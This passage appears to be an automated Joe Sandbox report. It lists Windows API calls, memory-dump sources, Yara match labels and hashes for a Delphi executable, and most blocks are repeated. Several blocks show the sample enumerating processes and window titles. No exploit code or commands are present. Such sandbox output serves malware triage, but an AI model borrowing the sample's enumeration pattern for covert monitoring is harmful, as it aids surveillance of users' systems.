                                                • CharToOemA.USER32(?,?), ref: 0042E667
                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E684
                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E68A
                                                • GetStdHandle.KERNEL32(000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E69F
                                                • WriteFile.KERNEL32(00000000,000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E6A5
                                                • LoadStringA.USER32(00000000,0000FFEB,?,00000040), ref: 0042E6C7
                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0042E6DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                • String ID:
                                                • API String ID: 185507032-0
                                                • Opcode ID: 401045d8ee95fbdf89e19f6e1ec223ffdeb1ebc428783b2908f96f474aea0da3
                                                • Instruction ID: f84d6c0ac8f674a6599e0b2749f10f63cfea0163ede0fee5985a43e8fc28d286
                                                • Opcode Fuzzy Hash: 401045d8ee95fbdf89e19f6e1ec223ffdeb1ebc428783b2908f96f474aea0da3
                                                • Instruction Fuzzy Hash: 59114FB1205324AAD200EB65EC46F9F77ACAB54704FC0491FB754D60E2DE78D944C76A
                                                APIs
                                                  • Part of subcall function 0042E498: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                  • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                  • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                  • Part of subcall function 0042E498: LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                • CharToOemA.USER32(?,?), ref: 0042E667
                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E684
                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E68A
                                                • GetStdHandle.KERNEL32(000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E69F
                                                • WriteFile.KERNEL32(00000000,000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E6A5
                                                • LoadStringA.USER32(00000000,0000FFEB,?,00000040), ref: 0042E6C7
                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0042E6DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                • String ID:
                                                • API String ID: 185507032-0
                                                • Opcode ID: baea71bdd7c72920dabe1177effcbf5504b31f12a8aae7cd7971186c44ea1b49
                                                • Instruction ID: f84d6c0ac8f674a6599e0b2749f10f63cfea0163ede0fee5985a43e8fc28d286
                                                • Opcode Fuzzy Hash: baea71bdd7c72920dabe1177effcbf5504b31f12a8aae7cd7971186c44ea1b49
                                                • Instruction Fuzzy Hash: 59114FB1205324AAD200EB65EC46F9F77ACAB54704FC0491FB754D60E2DE78D944C76A
                                                APIs
                                                • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422CD7
                                                • LocalFree.KERNEL32(00B4D1B0,00000000,00422D9C), ref: 00422CE9
                                                • VirtualFree.KERNEL32(?,00000000,00008000,00B4D1B0,00000000,00422D9C), ref: 00422D0D
                                                • LocalFree.KERNEL32(00000000,00B4D1B0,00000000,00422D9C), ref: 00422D5E
                                                • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422D8C
                                                • RtlDeleteCriticalSection.NTDLL(0051C5CC), ref: 00422D96
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                • String ID:
                                                • API String ID: 3782394904-0
                                                • Opcode ID: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                • Instruction ID: 51b20bc82c46605137a71ee0876b208d9b0e80c496a26de6aac0e9cff921d01f
                                                • Opcode Fuzzy Hash: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                • Instruction Fuzzy Hash: D8218170781610BFD710EBA8EA45B997FE4E719304F914497F400D73A1C6BDB984EB19
                                                APIs
                                                • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422CD7
                                                • LocalFree.KERNEL32(00B4D1B0,00000000,00422D9C), ref: 00422CE9
                                                • VirtualFree.KERNEL32(?,00000000,00008000,00B4D1B0,00000000,00422D9C), ref: 00422D0D
                                                • LocalFree.KERNEL32(00000000,00B4D1B0,00000000,00422D9C), ref: 00422D5E
                                                • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422D8C
                                                • RtlDeleteCriticalSection.NTDLL(0051C5CC), ref: 00422D96
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                • String ID:
                                                • API String ID: 3782394904-0
                                                • Opcode ID: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                • Instruction ID: 51b20bc82c46605137a71ee0876b208d9b0e80c496a26de6aac0e9cff921d01f
                                                • Opcode Fuzzy Hash: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                • Instruction Fuzzy Hash: D8218170781610BFD710EBA8EA45B997FE4E719304F914497F400D73A1C6BDB984EB19
                                                APIs
                                                  • Part of subcall function 004243D4: GetKeyboardType.USER32(00000000), ref: 004243D9
                                                  • Part of subcall function 004243D4: GetKeyboardType.USER32(00000001), ref: 004243E5
                                                • GetCommandLineA.KERNEL32 ref: 004279E7
                                                • GetVersion.KERNEL32 ref: 004279FB
                                                • GetVersion.KERNEL32 ref: 00427A0C
                                                • GetCurrentThreadId.KERNEL32 ref: 00427A48
                                                  • Part of subcall function 00424404: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                  • Part of subcall function 00424404: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                  • Part of subcall function 00424404: RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                • GetThreadLocale.KERNEL32 ref: 00427A28
                                                  • Part of subcall function 004278B8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042791E), ref: 004278DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                • String ID:
                                                • API String ID: 3734044017-0
                                                • Opcode ID: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                • Instruction ID: d1f10ed7233c6c26cc9ab7a9211c78b7d6b8eafa5dd651b04747b7567f40d78a
                                                • Opcode Fuzzy Hash: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                • Instruction Fuzzy Hash: 130156B0684261D9E714FBB1B90A38D3E50BB25308FC1955F944086262E7BE014CEB7E
                                                APIs
                                                  • Part of subcall function 004243D4: GetKeyboardType.USER32(00000000), ref: 004243D9
                                                  • Part of subcall function 004243D4: GetKeyboardType.USER32(00000001), ref: 004243E5
                                                • GetCommandLineA.KERNEL32 ref: 004279E7
                                                • GetVersion.KERNEL32 ref: 004279FB
                                                • GetVersion.KERNEL32 ref: 00427A0C
                                                • GetCurrentThreadId.KERNEL32 ref: 00427A48
                                                  • Part of subcall function 00424404: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                  • Part of subcall function 00424404: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                  • Part of subcall function 00424404: RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                • GetThreadLocale.KERNEL32 ref: 00427A28
                                                  • Part of subcall function 004278B8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042791E), ref: 004278DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                • String ID:
                                                • API String ID: 3734044017-0
                                                • Opcode ID: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                • Instruction ID: d1f10ed7233c6c26cc9ab7a9211c78b7d6b8eafa5dd651b04747b7567f40d78a
                                                • Opcode Fuzzy Hash: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                • Instruction Fuzzy Hash: 130156B0684261D9E714FBB1B90A38D3E50BB25308FC1955F944086262E7BE014CEB7E
                                                APIs
                                                • FindWindowW.USER32(00000000,?), ref: 004E75A6
                                                  • Part of subcall function 004CF5C8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF5D9
                                                • CloseHandle.KERNEL32(00000000), ref: 004E7557
                                                  • Part of subcall function 004CF648: Process32NextW.KERNEL32(00000000,?), ref: 004CF659
                                                • EnumWindows.USER32(004E7268,?), ref: 004E76D1
                                                  • Part of subcall function 004CF628: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004CF639
                                                • CloseHandle.KERNEL32(00000000), ref: 004E76C3
                                                  • Part of subcall function 00425D80: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00425CC7
                                                  • Part of subcall function 00425D80: SysFreeString.OLEAUT32(?), ref: 00425CD9
                                                  • Part of subcall function 00425C04: SysReAllocStringLen.OLEAUT32(-00000008,"lB,?), ref: 00425C1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String$AllocCloseHandleProcess32$CreateEnumFindFirstFreeNextSnapshotToolhelp32WindowWindows
                                                • String ID: 4rN
                                                • API String ID: 2697489950-1347347389
                                                • Opcode ID: f194a714a7efd85bda473ecfc0a6603ba410595ee8a9a87fd8048d74f52a551e
                                                • Instruction ID: 81800b201d129eb233c86aa27584eaf6e594e3464967b80929217755b8ff651a
                                                • Opcode Fuzzy Hash: f194a714a7efd85bda473ecfc0a6603ba410595ee8a9a87fd8048d74f52a551e
                                                • Instruction Fuzzy Hash: 1AB1B6347042598BCB20FB26DC85ABE77B6AF44315F5045ABE80497355E73CEE458B88
                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424C8A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: (B$<"B$<B
                                                • API String ID: 3192549508-3130809168
                                                • Opcode ID: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                • Instruction ID: ba7fb83052fc80cd7703b70a966ced7e32abaed02e915777dc773f657e1679cb
                                                • Opcode Fuzzy Hash: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                • Instruction Fuzzy Hash: 9041A0707042219FD720DF19E884B2BBBE5EFC8354FA6855AE84887351C739EC45CB69
                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424C8A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: (B$<"B$<B
                                                • API String ID: 3192549508-3130809168
                                                • Opcode ID: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                • Instruction ID: ba7fb83052fc80cd7703b70a966ced7e32abaed02e915777dc773f657e1679cb
                                                • Opcode Fuzzy Hash: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                • Instruction Fuzzy Hash: 9041A0707042219FD720DF19E884B2BBBE5EFC8354FA6855AE84887351C739EC45CB69
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                • RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                • API String ID: 3677997916-4173385793
                                                • Opcode ID: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                • Instruction ID: f32d36fbebf6c4c7954b05bf0a9ffb8b8aa37f3b827fee81d15b76f4adfa98af
                                                • Opcode Fuzzy Hash: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                • Instruction Fuzzy Hash: 0601D875B00318BAE711EBE0ED42FBD77FCEB48700F9000A6BA00D6580E6B96A15D76C
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                • RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                • API String ID: 3677997916-4173385793
                                                • Opcode ID: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                • Instruction ID: f32d36fbebf6c4c7954b05bf0a9ffb8b8aa37f3b827fee81d15b76f4adfa98af
                                                • Opcode Fuzzy Hash: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                • Instruction Fuzzy Hash: 0601D875B00318BAE711EBE0ED42FBD77FCEB48700F9000A6BA00D6580E6B96A15D76C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9fe27699cabda99f2469338a0172294736777644ee96d5e14d692abe27671e06
                                                • Instruction ID: 11a4c6921ebe278047dcd8f13468105319aefaf55964cb1d796cf0fb5e4db3cb
                                                • Opcode Fuzzy Hash: 9fe27699cabda99f2469338a0172294736777644ee96d5e14d692abe27671e06
                                                • Instruction Fuzzy Hash: 72D1C735B0010AEFCF10EF94C4919EDBBB5EF4D710F55A4AAE840A7311D638AE46CB69
                                                APIs
                                                • GetThreadLocale.KERNEL32(?,00000000,0042E24B,?,?,00000000), ref: 0042E1CC
                                                  • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E1FC
                                                • EnumCalendarInfoA.KERNEL32(Function_0000D100,00000000,00000000,00000004), ref: 0042E207
                                                • GetThreadLocale.KERNEL32(00000000,00000003,Function_0000D100,00000000,00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E225
                                                • EnumCalendarInfoA.KERNEL32(0042E13C,00000000,00000000,00000003), ref: 0042E230
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$InfoThread$CalendarEnum
                                                • String ID:
                                                • API String ID: 4102113445-0
                                                • Opcode ID: 1fe0cd520dcb76599e1cb0b27a2e36b6943e2181db81a567f1781bde662632bb
                                                • Instruction ID: 3b592c89afa61212c91c90111c7eadeea7ef6b57bd96fa3973e5640d51e683ed
                                                • Opcode Fuzzy Hash: 1fe0cd520dcb76599e1cb0b27a2e36b6943e2181db81a567f1781bde662632bb
                                                • Instruction Fuzzy Hash: 83014230304234ABE302AA72FD13F6E725CDB46728FE106AAF401966C9DA3C9E0141BC
                                                APIs
                                                • GetThreadLocale.KERNEL32(?,00000000,0042E24B,?,?,00000000), ref: 0042E1CC
                                                  • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E1FC
                                                • EnumCalendarInfoA.KERNEL32(Function_0002E100,00000000,00000000,00000004), ref: 0042E207
                                                • GetThreadLocale.KERNEL32(00000000,00000003,Function_0002E100,00000000,00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E225
                                                • EnumCalendarInfoA.KERNEL32(0042E13C,00000000,00000000,00000003), ref: 0042E230
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$InfoThread$CalendarEnum
                                                • String ID:
                                                • API String ID: 4102113445-0
                                                • Opcode ID: 570fafb30c039016a534684b3b436d893a8f8b07cf5ba7035df7416a7fa93ff0
                                                • Instruction ID: 3b592c89afa61212c91c90111c7eadeea7ef6b57bd96fa3973e5640d51e683ed
                                                • Opcode Fuzzy Hash: 570fafb30c039016a534684b3b436d893a8f8b07cf5ba7035df7416a7fa93ff0
                                                • Instruction Fuzzy Hash: 83014230304234ABE302AA72FD13F6E725CDB46728FE106AAF401966C9DA3C9E0141BC
                                                APIs
                                                • GetThreadLocale.KERNEL32(?,00000000,0042E42E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E293
                                                  • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$InfoThread
                                                • String ID: eeee$ggg$yyyy
                                                • API String ID: 4232894706-1253427255
                                                • Opcode ID: 85814b5940fb8fb1132efeca7088a26c00a9b99c439e5e332741e8934f1202d7
                                                • Instruction ID: 3cba33255c9bbdf1d265809368eb21140498f1bac8e05f245d93c13f2708a2d5
                                                • Opcode Fuzzy Hash: 85814b5940fb8fb1132efeca7088a26c00a9b99c439e5e332741e8934f1202d7
                                                • Instruction Fuzzy Hash: 1F41F3707044358BD711FA6BB8862BEA396DB88308BE4443BE841C7346DB7CDD02966E
                                                APIs
                                                • GetThreadLocale.KERNEL32(?,00000000,0042E42E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E293
                                                  • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$InfoThread
                                                • String ID: eeee$ggg$yyyy
                                                • API String ID: 4232894706-1253427255
                                                • Opcode ID: 46c053b22e6d49fbb08b1bec16dba0f949549f1e4e205da2495e25bbd6054d76
                                                • Instruction ID: 3cba33255c9bbdf1d265809368eb21140498f1bac8e05f245d93c13f2708a2d5
                                                • Opcode Fuzzy Hash: 46c053b22e6d49fbb08b1bec16dba0f949549f1e4e205da2495e25bbd6054d76
                                                • Instruction Fuzzy Hash: 1F41F3707044358BD711FA6BB8862BEA396DB88308BE4443BE841C7346DB7CDD02966E
                                                APIs
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 004E72B0
                                                • GetClassNameW.USER32(?,?,00000200), ref: 004E732F
                                                • GetWindowTextW.USER32(?,?,00000200), ref: 004E7396
                                                  • Part of subcall function 00425D80: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00425CC7
                                                  • Part of subcall function 00425D80: SysFreeString.OLEAUT32(?), ref: 00425CD9
                                                  • Part of subcall function 00425C04: SysReAllocStringLen.OLEAUT32(-00000008,"lB,?), ref: 00425C1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String$AllocWindow$ClassFreeNameProcessTextThread
                                                • String ID: qN
                                                • API String ID: 1689834521-1131524284
                                                • Opcode ID: ba3fd72ad012f3a2744c34faa204443ed89ba8ecd1608f0b8314df8e6e7ccf5b
